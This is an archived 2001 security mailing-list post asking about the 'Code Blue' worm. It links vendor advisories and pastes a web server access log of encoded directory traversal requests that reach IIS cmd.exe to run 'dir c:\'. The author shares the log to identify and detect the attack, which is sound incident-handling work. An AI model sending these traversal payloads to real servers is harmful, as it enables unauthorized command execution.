Security Incidents mailing list archives
Any one seen any evidence of "Code Blue?"
From: Michael Katz <mike () responsible com>
Date: Tue, 11 Sep 2001 19:18:39 -0700
Hi all,Why have I not seen anything on this list about the "Code Blue" worm? I have received some alerts and news stories about a "Code Blue" worm:
http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh A Chinese antivirus software company even has a cleanup tool for it at: http://www.iduba.net/download/other/tool_010907_CodeBlue.htmAnd other antivirus software companies now have virus definitions, explanations of the worm, and cleanup instructions:
http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html http://vil.mcafee.com/dispVirus.asp?virus_k=99202&; http://www.f-secure.com/v-descs/codeblue.shtmlLast, but not least, the FBI's Infragard program issued an advisory about it on September 10, 2001.
What is curious is the lack of discussion about it in a forum where I would expect to see it discussed.
Does anyone have a signature for IDS, what it looks like in a web server access log, or packet captures of its file transfer activity?
I submit the following web server access log as a possible candidate based on its source in Asia, that it is a new pattern we have seen recently, and it matches with the reported infection method:
a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
Does anyone know whether this is indicative of a Code Blue infected machine - or some other automated tool?
Michael Katz mike () responsible com Responsible Solutions, Ltd. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Any one seen any evidence of "Code Blue?" Michael Katz (Sep 11)
- Re: Any one seen any evidence of "Code Blue?" Yaakov Yehudi (Sep 12)
- Re: Any one seen any evidence of "Code Blue?" Nick FitzGerald (Sep 12)
- Re: Any one seen any evidence of "Code Blue?" H C (Sep 12)
- Concept Virus / Nimda Gary Warner (Sep 18)
- Re: Any one seen any evidence of "Code Blue?" H C (Sep 12)
- <Possible follow-ups>
- Re: Any one seen any evidence of "Code Blue?" Pedro Miller Rabinovitch (Sep 12)
- RE: Any one seen any evidence of "Code Blue?" Patrick Belcher, Monitored Security (Sep 12)